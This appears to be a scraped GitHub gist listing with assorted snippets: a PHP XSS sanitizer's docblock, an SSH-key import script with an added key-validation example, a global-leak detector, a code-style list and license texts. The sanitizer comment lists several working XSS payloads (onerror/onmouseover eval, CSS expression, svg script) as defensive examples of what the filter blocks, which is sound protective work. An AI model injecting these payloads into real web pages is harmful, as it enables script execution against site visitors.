Matt Pass mattpass

@soaj1664
soaj1664 / XSS Protection in 5 common contexts
Last active September 8, 2022 07:01
Per-Context Sanitizer Functions
<?php
/**
 * XSS protection function for HTML context only
 * @usecases
 * <title>use this function if output reflects here or as the content of any HTML tag.</title>
 * e.g., <span>use this function if output reflects here</span>
 * e.g., <div>use this function if output reflects here</div>
 * @description
 * Sanitize/filter < and > so that an attacker cannot leverage them for JavaScript execution.
 * Each of the following HTML-context payloads needs < or > to work:
 * <div style="color:rgb(''&#0;x:expression(alert(1))"></div>
 * <img/src=%00 id=confirm(1) onerror=eval(id)
 * <div id=confirm(1) onmouseover=eval(id)>X</div>
 * <span/onmouseover=confirm(1)>X</span>
 * <svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83)))
 */
@mattwillsher
mattwillsher / grant_github_user_access
Last active May 4, 2023 12:03
A script to pull SSH keys for a given GitHub user and add those keys to the current user's authorized_keys file.
#!/bin/bash
#
# (c)2014 Matt Willsher <[email protected]>
#
# Licensed under GPLv3 http://www.gnu.org/licenses/gpl.txt
#
umask 077   # anything this script creates (e.g. authorized_keys) is owner-readable only
if [[ $EUID == 0 ]]; then
  echo "This script can't be used as root" >&2
  exit 1
fi
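Appending whatever a remote endpoint returns to authorized_keys is the risky step in a script like this. As an added example (not the gist's script, and in JavaScript rather than bash), the block below validates each fetched line before merging it. It assumes the keys come from https://github.com/<user>.keys as "type base64 [comment]" lines; the gist may fetch them differently. The two key blobs are constructed dummies with valid wire format, not real keys, and the sample endpoint output is made up.

```javascript
// Added example, not the gist's script: validate public keys fetched for a
// GitHub user before appending them to authorized_keys. Function names are
// this example's own; sample keys and endpoint output are constructed.

const ALLOWED_TYPES = new Set(['ssh-ed25519', 'ecdsa-sha2-nistp256', 'ssh-rsa']);

// Parse one public-key line. Rejects option prefixes (command=, from=, ...),
// algorithms outside the allow-list, malformed base64, and blobs whose
// wire-format type string does not match the text type.
function parsePublicKey(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 2 || parts.length > 3) return null;
  const [type, b64, comment = ''] = parts;
  if (!ALLOWED_TYPES.has(type)) return null;
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(b64)) return null;
  const blob = Buffer.from(b64, 'base64');
  if (blob.length < 4) return null;
  const typeLen = blob.readUInt32BE(0);            // RFC 4251 string: uint32 length + bytes
  if (blob.length < 4 + typeLen) return null;
  if (blob.subarray(4, 4 + typeLen).toString('latin1') !== type) return null;
  return { type, b64, comment };
}

// Merge fetched keys into existing authorized_keys text: drop invalid lines,
// skip blobs already present (whatever options or comment they carry there),
// and tag each added line with a comment recording its origin.
function mergeAuthorizedKeys(existing, fetched, label) {
  const present = new Set();
  for (const line of existing.split('\n')) {
    // Every OpenSSH key blob base64-encodes to a string starting with "AAAA".
    for (const tok of line.trim().split(/\s+/)) if (tok.startsWith('AAAA')) present.add(tok);
  }
  const added = [], rejected = [];
  for (const raw of fetched.split('\n')) {
    if (raw.trim() === '') continue;
    const key = parsePublicKey(raw);
    if (!key) { rejected.push(raw); continue; }
    if (present.has(key.b64)) continue;
    present.add(key.b64);
    added.push(`${key.type} ${key.b64} ${label}`);
  }
  const merged = [existing.replace(/\s+$/, ''), ...added].filter(Boolean).join('\n') + '\n';
  return { merged, added, rejected };
}

// Constructed dummy ed25519 blobs (all-zero / last-byte-1 key material):
// valid wire format, not real keys.
const ED25519_HDR = 'AAAAC3NzaC1lZDI1NTE5AAAAI';   // uint32(11) "ssh-ed25519" uint32(32) ...
const KEY_A = ED25519_HDR + 'A'.repeat(43);
const KEY_B = ED25519_HDR + 'A'.repeat(42) + 'B';

// Constructed sample of what a user's key endpoint might return, junk included.
const FETCHED = [
  `ssh-ed25519 ${KEY_A} alice@laptop`,
  `ssh-ed25519 ${KEY_B}`,
  'ssh-dss AAAAB3NzaC1kc3MAAACBAP not-allowed',
  `command="id" ssh-ed25519 ${KEY_B}`,
  `ecdsa-sha2-nistp256 ${KEY_B}`,
].join('\n') + '\n';

// Constructed current authorized_keys content: KEY_A is already installed.
const EXISTING = `ssh-ed25519 ${KEY_A} alice@laptop\n`;
```

Against the sample input only KEY_B is added; the duplicate of KEY_A is skipped, and the ssh-dss line, the line carrying a command= option, and the line whose text type disagrees with its blob are all rejected. Writing the merged text back with mode 0600 is left to the caller, which is what the gist's umask 077 arranges.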
@bloodyowl
bloodyowl / gist:8460661
Last active January 3, 2016 12:09
global leaks
;(function(win){
  // Diff the page's globals against a pristine window (a fresh iframe) to find leaked globals
  var doc = win.document
    , frame = doc.body.appendChild(doc.createElement("iframe"))
    , i = Object.keys(frame.contentWindow)
  doc.body.removeChild(frame)
  return Object.keys(win).filter(function(a){return i.indexOf(a) == -1})
})(window)
@Prinzhorn
Prinzhorn / README.md
Last active December 25, 2015 22:59
QR code bookmarklet

Just add the snippet as a bookmarklet and instantly turn the current website's URL into a QR code. Very useful when you quickly want to open the page on mobile.

@dypsilon
dypsilon / frontendDevlopmentBookmarks.md
Last active November 16, 2025 11:36
A badass list of frontend development resources I collected over time.
@sindresorhus
sindresorhus / codestyle.md
Last active September 26, 2023 07:45
My preferred code style.

Code Style

  • Tab indentation
  • Single-quotes
  • Semicolon
  • Strict mode
  • No trailing whitespace
  • Multiple variable statements
  • Space after keywords and between arguments and operators
  • Return early
@sklppr
sklppr / twitter-friends.rb
Created September 13, 2012 15:26
Fetches info about the people you follow on Twitter and determines who you could/should unfollow.
# encoding: utf-8
#####################################################################################
#
# Fetches info about the people you follow on Twitter
# and determines who you could/should unfollow based on:
# - activity: was their last update more than 3 months ago?
# - popularity: do they have less than 25 followers?
# - mass following: are they following more than 10000 people?
@maettig
maettig / LICENSE.txt
Created January 18, 2012 19:06 — forked from 140bytes/LICENSE.txt
findDiffBetweenStrings in 140byt.es
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2012 Thiemo Mättig <http://maettig.com>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@maettig
maettig / LICENSE.txt
Created January 16, 2012 16:56 — forked from 140bytes/LICENSE.txt
dumpGlobalLeaks in 140byt.es
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2012 Thiemo Mättig <http://maettig.com>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE